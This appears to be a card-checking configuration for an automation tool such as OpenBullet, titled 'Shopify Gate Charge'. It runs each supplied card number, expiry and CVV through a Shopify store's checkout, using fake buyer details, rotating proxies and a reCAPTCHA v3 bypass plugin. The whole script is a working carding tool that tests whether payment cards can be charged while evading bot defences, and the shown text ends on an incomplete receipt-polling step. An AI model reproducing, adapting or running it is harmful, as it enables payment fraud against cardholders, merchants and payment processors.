[SETTINGS]
{
  "Name": "Shopify Gate Charge Autoshopify All",
  "SuggestedBots": 20,
  "MaxCPM": 0,
  "LastModified": "2026-01-25T00:00:00.0000000+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [
    "RecaptchaV3Bypass"
  ],
  "Author": "@Tarun_mass_007",
  "Version": "2.0.0 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "shopify $2",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#site FUNCTION Constant "<site>" -> VAR "site" 

#CC FUNCTION Constant "<cc>" -> VAR "CC" 

#MES FUNCTION Constant "<mes>" -> VAR "MES" 

#ANO FUNCTION Constant "<ano>" -> VAR "ANO" 

#CVV FUNCTION Constant "<cvv>" -> VAR "CVV" 

!#ClearCookies FUNCTION ClearCookies 

# Step 1: Fetch products.json
REQUEST GET "https://<site>/products.json" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.6367.207 Safari/537.36" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Language: en-US,en;q=0.9" 

PARSE "<SOURCE>" LR "" "" -> VAR "products_raw" 

#variantid PARSE "<SOURCE>" LR "\"variant\":{\"id\":" "," CreateEmpty=FALSE -> VAR "variantid" 

#price1 PARSE "<SOURCE>" LR "\"price\":\"" "\"" CreateEmpty=FALSE -> VAR "price1" 

# Extract first available product variant ID and price
#variantid PARSE "<SOURCE>" LR "\"variants\":[{\"id\":" "," CreateEmpty=FALSE -> VAR "variantid" 

#price1 PARSE "<SOURCE>" LR "\"price\":\"" "\"" CreateEmpty=FALSE -> VAR "price1" 

# Step 2: Create cart via GraphQL API
#CART_CREATE REQUEST POST "https://<site>/api/unstable/graphql.json" 
  CONTENT "{\"query\":\"mutation CartCreate($input: CartInput!) { cartCreate(input: $input) { cart { checkoutUrl } } }\",\"variables\":{\"input\":{\"lines\":[{\"merchandiseId\":\"gid://shopify/ProductVariant/<variantid>\",\"quantity\":1,\"attributes\":[]}],\"discountCodes\":[]},\"country\":\"US\",\"language\":\"EN\"}}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.6367.207 Safari/537.36" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Language: en-US,en;q=0.9" 

#checkout_url PARSE "<SOURCE>" LR "\"checkoutUrl\":\"" "\"" CreateEmpty=FALSE -> VAR "checkout_url" 

# Step 3: Get checkout page
#CHECKOUT REQUEST GET "<checkout_url>?auto_redirect=false" AutoRedirect=FALSE 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.6367.207 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "sec-ch-ua: \"Chromium\";v=\"137\", \"Not/A)Brand\";v=\"24\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 

#raw PARSE "<SOURCE>" LR "" "" -> VAR "raw" 

#tok PARSE "<SOURCE>" LR "serialized-source-token\" content=\"&quot;" "&quot;\"" CreateEmpty=FALSE -> VAR "tok" 

#x_checkout_one_session_token PARSE "<SOURCE>" LR "serialized-session-token\" content=\"&quot;" "&quot;\"" CreateEmpty=FALSE -> VAR "x_check" 

#queue_token PARSE "<SOURCE>" LR "queueToken&quot;:&quot;" "&quot;" CreateEmpty=FALSE -> VAR "queue_token" 

#stable_id PARSE "<SOURCE>" LR "stableId&quot;:&quot;" "&quot;" CreateEmpty=FALSE -> VAR "stable_id" 

#paymentMethodIdentifier PARSE "<SOURCE>" LR "paymentMethodIdentifier&quot;:&quot;" "&quot;" CreateEmpty=FALSE -> VAR "payment_idf" 

#web_build PARSE "<SOURCE>" LR "\"sha\"\s*:\s*\"([a-fA-F0-9]{40})\"" "\"" CreateEmpty=FALSE -> VAR "web_build" 

#currency_code PARSE "<SOURCE>" LR "currencyCode&quot;:&quot;" "&quot;" CreateEmpty=FALSE -> VAR "currency_code" 

#country_code PARSE "<SOURCE>" LR "countryCode&quot;:&quot;" "&quot;" CreateEmpty=FALSE -> VAR "country_code" 

#tax1 PARSE "<SOURCE>" LR "totalTaxAndDutyAmount&quot;:{&quot;value&quot;:{&quot;amount&quot;:&quot;" "&quot" CreateEmpty=FALSE -> VAR "tax1" 

# Step 4: Create payment session
#sessions REQUEST POST "https://checkout.pci.shopifyinc.com/sessions" 
  CONTENT "{\"credit_card\":{\"number\":\"<cc>\",\"month\":<mes>,\"year\":<ano>,\"verification_value\":\"<cvv>\",\"start_month\":null,\"start_year\":null,\"issue_number\":\"\",\"name\":\"Laka Lama\"},\"payment_session_scope\":\"<site>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.6367.207 Safari/537.36" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "authority: checkout.pci.shopifyinc.com" 
  HEADER "origin: https://checkout.pci.shopifyinc.com" 
  HEADER "referer: https://checkout.pci.shopifyinc.com/" 

#id PARSE "<SOURCE>" LR "{\"id\":\"" "\"}" CreateEmpty=FALSE -> VAR "id" 

# Step 5: Proposal negotiation (first time)
#PROPOSAL1 REQUEST POST "https://<site>/checkouts/unstable/graphql?operationName=Proposal" 
  CONTENT "{\"query\":\"query Proposal($sessionInput:SessionTokenInput!,$queueToken:String!){session(sessionInput:$sessionInput){negotiate(input:{purchaseProposal:{delivery:{deliveryLines:[{destination:{partialStreetAddress:{address1:\\\"123 Main\\\",city:\\\"New York\\\",countryCode:\\\"US\\\",postalCode:\\\"10080\\\",firstName:\\\"Laka\\\",lastName:\\\"Lama\\\",zoneCode:\\\"NY\\\",phone:\\\"2194157586\\\",oneTimeUse:false}},selectedDeliveryStrategy:{deliveryStrategyMatchingConditions:{estimatedTimeInTransit:{any:true},shipments:{any:true}},options:{}},targetMerchandiseLines:{any:true},deliveryMethodTypes:[\\\"SHIPPING\\\"],expectedTotalPrice:{any:true},destinationChanged:false}],noDeliveryRequired:[],useProgressiveRates:false,prefetchShippingRatesStrategy:null,supportsSplitShipping:true},deliveryExpectations:{deliveryExpectationLines:[]},merchandise:{merchandiseLines:[{stableId:\\\"<stable_id>\\\",merchandise:{productVariantReference:{id:\\\"gid://shopify/ProductVariantMerchandise/<variantid>\\\",variantId:\\\"gid://shopify/ProductVariant/<variantid>\\\",properties:[],sellingPlanId:null,sellingPlanDigest:null}},quantity:{items:{value:1}},expectedTotalPrice:{value:{amount:\\\"<price1>\\\",currencyCode:\\\"<currency_code>\\\"}},lineComponentsSource:null,lineComponents:[]}]},memberships:{memberships:[]},payment:{totalAmount:{any:true},paymentLines:[],billingAddress:{streetAddress:{address1:\\\"123 Main\\\",city:\\\"New York\\\",countryCode:\\\"US\\\",postalCode:\\\"10080\\\",firstName:\\\"Laka\\\",lastName:\\\"Lama\\\",zoneCode:\\\"NY\\\",phone:\\\"2194157586\"}}},buyerIdentity:{customer:{presentmentCurrency:\\\"<currency_code>\\\",countryCode:\\\"<country_code>\\\"},email:\\\"gmail123456@gmail.com\\\",emailChanged:false,phoneCountryCode:\\\"<country_code>\\\",marketingConsent:[],shopPayOptInPhone:{countryCode:\\\"<country_code>\\\"},rememberMe:false},tip:{tipLines:[]},taxes:{proposedAllocations:null,proposedTotalAmount:{value:{amount:\\\"<tax1>\\\",currencyCode:\\\"<currency_code>\\\"}},proposedTotalIncludedAmount:null,proposedMixedStateTotalAmount:null,proposedExemptions:[]},note:{message:null,customAttributes:[]},localizationExtension:{fields:[]},nonNegotiableTerms:null,scriptFingerprint:{signature:null,signatureUuid:null,lineItemScriptChanges:[],paymentScriptChanges:[],shippingScriptChanges:[]},optionalDuties:{buyerRefusesDuties:false},captcha:null,cartMetafields:[]},checkpointData:null,queueToken:\\\"<queue_token>\\\",changesetTokens:null}){__typename result{...on NegotiationResultAvailable{checkpointData queueToken buyerProposal{...BuyerProposalDetails __typename}sellerProposal{...ProposalDetails __typename}__typename}...on CheckpointDenied{redirectUrl __typename}...on Throttled{pollAfter queueToken pollUrl __typename}...on SubmittedForCompletion{receipt{...ReceiptDetails __typename}__typename}...on NegotiationResultFailed{__typename reportable}__typename}errors{code localizedMessage nonLocalizedMessage localizedMessageHtml...on RemoveTermViolation{target __typename}...on AcceptNewTermViolation{target __typename}...on ConfirmChangeViolation{from to __typename}...on UnprocessableTermViolation{target __typename}...on UnresolvableTermViolation{target __typename}...on ApplyChangeViolation{target from{...on ApplyChangeValueInt{value __typename}...on ApplyChangeValueRemoval{value __typename}...on ApplyChangeValueString{value __typename}__typename}to{...on ApplyChangeValueInt{value __typename}...on ApplyChangeValueRemoval{value __typename}...on ApplyChangeValueString{value __typename}__typename}__typename}...on GenericError{__typename}...on PendingTermViolation{__typename}__typename}}__typename}}\",\"variables\":{\"sessionInput\":{\"sessionToken\":\"<x_check>\"},\"queueToken\":\"<queue_token>\"},\"operationName\":\"Proposal\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.6367.207 Safari/537.36" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "origin: https://<site>" 
  HEADER "referer: https://<site>" 
  HEADER "shopify-checkout-client: checkout-web/1.0" 
  HEADER "x-checkout-one-session-token: <x_check>" 
  HEADER "x-checkout-web-build-id: <web_build>" 
  HEADER "x-checkout-web-deploy-stage: production" 
  HEADER "x-checkout-web-server-handling: fast" 
  HEADER "x-checkout-web-server-rendering: yes" 
  HEADER "x-checkout-web-source-id: <tok>" 

#tax2 PARSE "<SOURCE>" LR "\"totalTaxAndDutyAmount\"\s*:\s*{[^}]*\"value\"\s*:\s*{[^}]*\"amount\"\s*:\s*\"([\d.]+)\"" "\"" CreateEmpty=FALSE -> VAR "tax2" 

#signedHandle PARSE "<SOURCE>" LR "\"signedHandle\"\s*:\s*\"([^\"]+)\"" "\"" CreateEmpty=FALSE -> VAR "signedHandle" 

#delivery_handle PARSE "<SOURCE>" LR "\"handle\"\s*:\s*\"([^\"]+)\"" "\"" CreateEmpty=FALSE -> VAR "delivery_handle" 

#total_amount PARSE "<SOURCE>" LR "\"checkoutTotal\"\s*:\s*{[^}]*\"value\"\s*:\s*{[^}]*\"amount\"\s*:\s*\"([\d.]+)\"" "\"" CreateEmpty=FALSE -> VAR "total_amount" 

# Step 6: Proposal negotiation (second time with updated tax)
#PROPOSAL2 REQUEST POST "https://<site>/checkouts/unstable/graphql?operationName=Proposal" 
  CONTENT "{\"query\":\"query Proposal($sessionInput:SessionTokenInput!,$queueToken:String!){session(sessionInput:$sessionInput){negotiate(input:{purchaseProposal:{delivery:{deliveryLines:[{destination:{partialStreetAddress:{address1:\\\"123 Main\\\",city:\\\"New York\\\",countryCode:\\\"US\\\",postalCode:\\\"10080\\\",firstName:\\\"Laka\\\",lastName:\\\"Lama\\\",zoneCode:\\\"NY\\\",phone:\\\"2194157586\\\",oneTimeUse:false}},selectedDeliveryStrategy:{deliveryStrategyMatchingConditions:{estimatedTimeInTransit:{any:true},shipments:{any:true}},options:{}},targetMerchandiseLines:{any:true},deliveryMethodTypes:[\\\"SHIPPING\\\",\\\"LOCAL\\\"],expectedTotalPrice:{any:true},destinationChanged:false}],noDeliveryRequired:[],useProgressiveRates:false,prefetchShippingRatesStrategy:null,supportsSplitShipping:true},deliveryExpectations:{deliveryExpectationLines:[]},merchandise:{merchandiseLines:[{stableId:\\\"<stable_id>\\\",merchandise:{productVariantReference:{id:\\\"gid://shopify/ProductVariantMerchandise/<variantid>\\\",variantId:\\\"gid://shopify/ProductVariant/<variantid>\\\",properties:[],sellingPlanId:null,sellingPlanDigest:null}},quantity:{items:{value:1}},expectedTotalPrice:{value:{amount:\\\"<price1>\\\",currencyCode:\\\"<currency_code>\\\"}},lineComponentsSource:null,lineComponents:[]}]},memberships:{memberships:[]},payment:{totalAmount:{any:true},paymentLines:[],billingAddress:{streetAddress:{address1:\\\"123 Main\\\",city:\\\"New York\\\",countryCode:\\\"US\\\",postalCode:\\\"10080\\\",firstName:\\\"Laka\\\",lastName:\\\"Lama\\\",zoneCode:\\\"NY\\\",phone:\\\"2194157586\"}}},buyerIdentity:{customer:{presentmentCurrency:\\\"<currency_code>\\\",countryCode:\\\"<country_code>\\\"},email:\\\"gmail123456@gmail.com\\\",emailChanged:false,phoneCountryCode:\\\"<country_code>\\\",marketingConsent:[],shopPayOptInPhone:{countryCode:\\\"<country_code>\\\"},rememberMe:false},tip:{tipLines:[]},taxes:{proposedAllocations:null,proposedTotalAmount:{value:{amount:\\\"<tax2>\\\",currencyCode:\\\"<currency_code>\\\"}},proposedTotalIncludedAmount:null,proposedMixedStateTotalAmount:null,proposedExemptions:[]},note:{message:null,customAttributes:[]},localizationExtension:{fields:[]},nonNegotiableTerms:null,scriptFingerprint:{signature:null,signatureUuid:null,lineItemScriptChanges:[],paymentScriptChanges:[],shippingScriptChanges:[]},optionalDuties:{buyerRefusesDuties:false},captcha:null,cartMetafields:[]},checkpointData:null,queueToken:\\\"<queue_token>\\\",changesetTokens:null}){__typename result{...on NegotiationResultAvailable{checkpointData queueToken buyerProposal{...BuyerProposalDetails __typename}sellerProposal{...ProposalDetails __typename}__typename}...on CheckpointDenied{redirectUrl __typename}...on Throttled{pollAfter queueToken pollUrl __typename}...on SubmittedForCompletion{receipt{...ReceiptDetails __typename}__typename}...on NegotiationResultFailed{__typename reportable}__typename}errors{code localizedMessage nonLocalizedMessage localizedMessageHtml...on RemoveTermViolation{target __typename}...on AcceptNewTermViolation{target __typename}...on ConfirmChangeViolation{from to __typename}...on UnprocessableTermViolation{target __typename}...on UnresolvableTermViolation{target __typename}...on ApplyChangeViolation{target from{...on ApplyChangeValueInt{value __typename}...on ApplyChangeValueRemoval{value __typename}...on ApplyChangeValueString{value __typename}__typename}to{...on ApplyChangeValueInt{value __typename}...on ApplyChangeValueRemoval{value __typename}...on ApplyChangeValueString{value __typename}__typename}__typename}...on GenericError{__typename}...on PendingTermViolation{__typename}__typename}}__typename}}\",\"variables\":{\"sessionInput\":{\"sessionToken\":\"<x_check>\"},\"queueToken\":\"<queue_token>\"},\"operationName\":\"Proposal\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.6367.207 Safari/537.36" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "origin: https://<site>" 
  HEADER "referer: https://<site>" 
  HEADER "shopify-checkout-client: checkout-web/1.0" 
  HEADER "x-checkout-one-session-token: <x_check>" 
  HEADER "x-checkout-web-build-id: <web_build>" 
  HEADER "x-checkout-web-deploy-stage: production" 
  HEADER "x-checkout-web-server-handling: fast" 
  HEADER "x-checkout-web-server-rendering: yes" 
  HEADER "x-checkout-web-source-id: <tok>" 

# Step 7: Submit for completion
#Sub_for_comp REQUEST POST "https://<site>/checkouts/unstable/graphql?operationName=SubmitForCompletion" 
  CONTENT "{\"variables\":{\"input\":{\"sessionInput\":{\"sessionToken\":\"<x_check>\"},\"queueToken\":\"<queue_token>\",\"discounts\":{\"lines\":[],\"acceptUnexpectedDiscounts\":true},\"delivery\":{\"deliveryLines\":[{\"selectedDeliveryStrategy\":{\"deliveryStrategyMatchingConditions\":{\"estimatedTimeInTransit\":{\"any\":true},\"shipments\":{\"any\":true}},\"options\":{}},\"targetMerchandiseLines\":{\"lines\":[{\"stableId\":\"<stable_id>\"}]},\"deliveryMethodTypes\":[\"SHIPPING\",\"LOCAL\"],\"expectedTotalPrice\":{\"any\":true},\"destinationChanged\":false}],\"noDeliveryRequired\":[],\"useProgressiveRates\":false,\"prefetchShippingRatesStrategy\":null,\"supportsSplitShipping\":true},\"deliveryExpectations\":{\"deliveryExpectationLines\":[]},\"merchandise\":{\"merchandiseLines\":[{\"stableId\":\"<stable_id>\",\"merchandise\":{\"productVariantReference\":{\"id\":\"gid://shopify/ProductVariantMerchandise/<variantid>\",\"variantId\":\"gid://shopify/ProductVariant/<variantid>\",\"properties\":[],\"sellingPlanId\":null,\"sellingPlanDigest\":null}},\"quantity\":{\"items\":{\"value\":1}},\"expectedTotalPrice\":{\"value\":{\"amount\":\"<price1>\",\"currencyCode\":\"<currency_code>\"}},\"lineComponentsSource\":null,\"lineComponents\":[]}]},\"memberships\":{\"memberships\":[]},\"payment\":{\"totalAmount\":{\"any\":true},\"paymentLines\":[{\"paymentMethod\":{\"directPaymentMethod\":{\"paymentMethodIdentifier\":\"<payment_idf>\",\"sessionId\":\"<id>\",\"billingAddress\":{\"streetAddress\":{\"address1\":\"123 Main\",\"city\":\"New York\",\"countryCode\":\"US\",\"postalCode\":\"10080\",\"firstName\":\"Laka\",\"lastName\":\"Lama\",\"zoneCode\":\"NY\",\"phone\":\"2194157586\"}},\"cardSource\":null},\"giftCardPaymentMethod\":null,\"redeemablePaymentMethod\":null,\"walletPaymentMethod\":null,\"walletsPlatformPaymentMethod\":null,\"localPaymentMethod\":null,\"paymentOnDeliveryMethod\":null,\"paymentOnDeliveryMethod2\":null,\"manualPaymentMethod\":null,\"customPaymentMethod\":null,\"offsitePaymentMethod\":null,\"customOnsitePaymentMethod\":null,\"deferredPaymentMethod\":null,\"customerCreditCardPaymentMethod\":null,\"paypalBillingAgreementPaymentMethod\":null,\"remotePaymentInstrument\":null},\"amount\":{\"value\":{\"amount\":\"<total_amount>\",\"currencyCode\":\"<currency_code>\"}}}],\"billingAddress\":{\"streetAddress\":{\"address1\":\"123 Main\",\"city\":\"New York\",\"countryCode\":\"US\",\"postalCode\":\"10080\",\"firstName\":\"Laka\",\"lastName\":\"Lama\",\"zoneCode\":\"NY\",\"phone\":\"2194157586\"}}},\"buyerIdentity\":{\"customer\":{\"presentmentCurrency\":\"<currency_code>\",\"countryCode\":\"<country_code>\"},\"email\":\"gmail123456@gmail.com\",\"emailChanged\":false,\"phoneCountryCode\":\"<country_code>\",\"marketingConsent\":[],\"shopPayOptInPhone\":{\"countryCode\":\"<country_code>\"},\"rememberMe\":false},\"tip\":{\"tipLines\":[]},\"taxes\":{\"proposedAllocations\":null,\"proposedTotalAmount\":{\"value\":{\"amount\":\"<tax2>\",\"currencyCode\":\"<currency_code>\"}},\"proposedTotalIncludedAmount\":null,\"proposedMixedStateTotalAmount\":null},\"note\":{\"message\":null,\"customAttributes\":[]},\"localizationExtension\":{\"fields\":[]},\"nonNegotiableTerms\":null,\"scriptFingerprint\":{\"signature\":null,\"signatureUuid\":null,\"lineItemScriptChanges\":[],\"paymentScriptChanges\":[],\"shippingScriptChanges\":[]},\"optionalDuties\":{\"buyerRefusesDuties\":false},\"captcha\":null,\"cartMetafields\":[]},\"attemptToken\":\"<tok>-4j33p1vmcd5\",\"metafields\":[],\"analytics\":{\"requestUrl\":\"<checkout_url>\",\"pageId\":\"97cf2a68-FFBC-4F9E-A74F-EA7F7448727E\"}},\"operationName\":\"SubmitForCompletion\",\"query\":\"mutation SubmitForCompletion($input:NegotiationInput!,$attemptToken:String!,$metafields:[MetafieldInput!],$postPurchaseInquiryResult:PostPurchaseInquiryResultCode,$analytics:AnalyticsInput){submitForCompletion(input:$input attemptToken:$attemptToken metafields:$metafields postPurchaseInquiryResult:$postPurchaseInquiryResult analytics:$analytics){...on SubmitSuccess{receipt{...ReceiptDetails __typename}__typename}...on SubmitAlreadyAccepted{receipt{...ReceiptDetails __typename}__typename}...on SubmitFailed{reason __typename}...on SubmitRejected{buyerProposal{...BuyerProposalDetails __typename}sellerProposal{...ProposalDetails __typename}errors{...on NegotiationError{code localizedMessage nonLocalizedMessage localizedMessageHtml...on RemoveTermViolation{message{code localizedDescription __typename}target __typename}...on AcceptNewTermViolation{message{code localizedDescription __typename}target __typename}...on ConfirmChangeViolation{message{code localizedDescription __typename}target __typename}...on UnprocessableTermViolation{message{code localizedDescription __typename}target __typename}...on UnresolvableTermViolation{message{code localizedDescription __typename}target __typename}...on ApplyChangeViolation{message{code localizedDescription __typename}target __typename}...on RedirectRequiredViolation{target details __typename}...on InputValidationError{field __typename}...on PendingTermViolation{__typename}__typename}__typename}__typename}...on Throttled{pollAfter pollUrl queueToken buyerProposal{...BuyerProposalDetails __typename}__typename}...on CheckpointDenied{redirectUrl __typename}...on TooManyAttempts{redirectUrl __typename}...on SubmittedForCompletion{receipt{...ReceiptDetails __typename}__typename}__typename}}\"" 
  CONTENTTYPE "application/json" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.6367.207 Safari/537.36" 
  HEADER "Accept: application/json" 
  HEADER "shopify-checkout-source: id=\"<tok>\", type=\"cn\"" 
  HEADER "x-checkout-one-session-token: <x_check>" 
  HEADER "x-checkout-web-build-id: <web_build>" 
  HEADER "x-checkout-web-deploy-stage: production" 
  HEADER "x-checkout-web-server-handling: fast" 
  HEADER "x-checkout-web-server-rendering: no" 
  HEADER "x-checkout-web-source-id: <tok>" 

!RecaptchaV3Bypass "" "!q62grYxHRvVxjUIjSFNd0mlvrZ-iCgIHAAAB6FcAAAANnAkBySdqTJGFRK7SirleWAwPVhv9-XwP8ugGSTJJgQ46-0IMBKN8HUnfPqm4sCefwxOOEURND35prc9DJYG0pbmg_jD18qC0c-lQzuPsOtUhHTtfv3--SVCcRvJWZ0V3cia65HGfUys0e1K-IZoArlxM9qZfUMXJKAFuWqZiBn-Qi8VnDqI2rRnAQcIB8Wra6xWzmFbRR2NZqF7lDPKZ0_SZBEc99_49j07ISW4X65sMHL139EARIOipdsj5js5JyM19a2TCZJtAu4XL1h0ZLfomM8KDHkcl_b0L-jW9cvAe2K2uQXKRPzruAvtjdhMdODzVWU5VawKhpmi2NCKAiCRUlJW5lToYkR_X-07AqFLY6qi4ZbJ_sSrD7fCNNYFKmLfAaxPwPmp5Dgei7KKvEQmeUEZwTQAS1p2gaBmt6SCOgId3QBfF_robIkJMcXFzj7R0G-s8rwGUSc8EQzT_DCe9SZsJyobu3Ps0-YK-W3MPWk6a69o618zPSIIQtSCor9w_oUYTLiptaBAEY03NWINhc1mmiYu2Yz5apkW_KbAp3HD3G0bhzcCIYZOGZxyJ44HdGsCJ-7ZFTcEAUST-aLbS-YN1AyuC7ClFO86CMICVDg6aIDyCJyIcaJXiN-bN5xQD_NixaXatJy9Mx1XEnU4Q7E_KISDJfKUhDktK5LMqBJa-x1EIOcY99E-eyry7crf3-Hax3Uj-e-euzRwLxn2VB1Uki8nqJQVYUgcjlVXQhj1X7tx4jzUb0yB1TPU9uMBtZLRvMCRKvFdnn77HgYs5bwOo2mRECiFButgigKXaaJup6NM4KRUevhaDtnD6aJ8ZWQZTXz_OJ74a_OvPK9eD1_5pTG2tUyYNSyz-alhvHdMt5_MAdI3op4ZmcvBQBV9VC2JLjphDuTW8eW_nuK9hN17zin6vjEL8YIm_MekB_dIUK3T1Nbyqmyzigy-Lg8tRL6jSinzdwOTc9hS5SCsPjMeiblc65aJC8AKmA5i80f-6Eg4BT305UeXKI3QwhI3ZJyyQAJTata41FoOXl3EF9Pyy8diYFK2G-CS8lxEpV7jcRYduz4tEPeCpBxU4O_KtM2iv4STkwO4Z_-c-fMLlYu9H7jiFnk6Yh8XlPE__3q0FHIBFf15zVSZ3qroshYiHBMxM5BVQBOExbjoEdYKx4-m9c23K3suA2sCkxHytptG-6yhHJR3EyWwSRTY7OpX_yvhbFri0vgchw7U6ujyoXeCXS9N4oOoGYpS5OyFyRPLxJH7yjXOG2Play5HJ91LL6J6qg1iY8MIq9XQtiVZHadVpZVlz3iKcX4vXcQ3rv_qQwhntObGXPAGJWEel5OiJ1App7mWy961q3mPg9aDEp9VLKU5yDDw1xf6tOFMwg2Q-PNDaKXAyP_FOkxOjnu8dPhuKGut6cJr449BKDwbnA9BOomcVSztEzHGU6HPXXyNdZbfA6D12f5lWxX2B_pobw3a1gFLnO6mWaNRuK1zfzZcfGTYMATf6d7sj9RcKNS230XPHWGaMlLmNxsgXkEN7a9PwsSVwcKdHg_HU4vYdRX6vkEauOIwVPs4dS7yZXmtvbDaX1zOU4ZYWg0T42sT3nIIl9M2EeFS5Rqms_YzNp8J-YtRz1h5RhtTTNcA5jX4N-xDEVx-vD36bZVzfoMSL2k85PKv7pQGLH-0a3DsR0pePCTBWNORK0g_RZCU_H898-nT1syGzNKWGoPCstWPRvpL9cnHRPM1ZKemRn0nPVm9Bgo0ksuUijgXc5yyrf5K49UU2J5JgFYpSp7aMGOUb1ibrj2sr-D63d61DtzFJ2mwrLm_KHBiN_ECpVhDsRvHe5iOx_APHtImevOUxghtkj-8RJruPgkTVaML2MEDOdL_UYaldeo-5ckZo3VHss7IpLArGOMTEd0bSH8tA8CL8RLQQeSokOMZ79Haxj8yE0EAVZ-k9-O72mmu5I0wH5IPgapNvExeX6O1l3mC4MqLhKPdOZOnTiEBlSrV4ZDH_9fhLUahe5ocZXvXqrud9QGNeTpZsSPeIYubeOC0sOsuqk10sWB7NP-lhifWeDob-IK1JWcgFTytVc99RkZTjUcdG9t8prPlKAagZIsDr1TiX3dy8sXKZ7d9EXQF5P_rHJ8xvmUtCWqbc3V5jL-qe8ANypwHsuva75Q6dtqoBR8vCE5xWgfwB0GzR3Xi_l7KDTsYAQIrDZVyY1UxdzWBwJCrvDrtrNsnt0S7BhBJ4ATCrW5VFPqXyXRiLxHCIv9zgo-NdBZQ4hEXXxMtbem3KgYUB1Rals1bbi8X8MsmselnHfY5LdOseyXWIR2QcrANSAypQUAhwVpsModw7HMdXgV9Uc-HwCMWafOChhBr88tOowqVHttPtwYorYrzriXNRt9LkigESMy1bEDx79CJguitwjQ9IyIEu8quEQb_-7AEXrfDzl_FKgASnnZLrAfZMtgyyddIhBpgAvgR_c8a8Nuro-RGV0aNuunVg8NjL8binz9kgmZvOS38QaP5anf2vgzJ9wC0ZKDg2Ad77dPjBCiCRtVe_dqm7FDA_cS97DkAwVfFawgce1wfWqsrjZvu4k6x3PAUH1UNzQUxVgOGUbqJsaFs3GZIMiI8O6-tZktz8i8oqpr0RjkfUhw_I2szHF3LM20_bFwhtINwg0rZxRTrg4il-_q7jDnVOTqQ7fdgHgiJHZw_OOB7JWoRW6ZlJmx3La8oV93fl1wMGNrpojSR0b6pc8SThsKCUgoY6zajWWa3CesX1ZLUtE7Pfk9eDey3stIWf2acKolZ9fU-gspeACUCN20EhGT-HvBtNBGr_xWk1zVJBgNG29olXCpF26eXNKNCCovsILNDgH06vulDUG_vR5RrGe5LsXksIoTMYsCUitLz4HEehUOd9mWCmLCl00eGRCkwr9EB557lyr7mBK2KPgJkXhNmmPSbDy6hPaQ057zfAd5s_43UBCMtI-aAs5NN4TXHd6IlLwynwc1zsYOQ6z_HARlcMpCV9ac-8eOKsaepgjOAX4YHfg3NekrxA2ynrvwk9U-gCtpxMJ4f1cVx3jExNlIX5LxE46FYIhQ" "" -> VAR "" 
!  

#bill PARSE "<SOURCE>" LR "{\"receipt\":{\"id\":\"" "\"," CreateEmpty=FALSE -> VAR "bill" 

# Step 8: Poll for receipt
#PollForReceipt REQUEST POST "https://<site>/checkouts/unstable/graphql?operationName=PollForReceipt" 
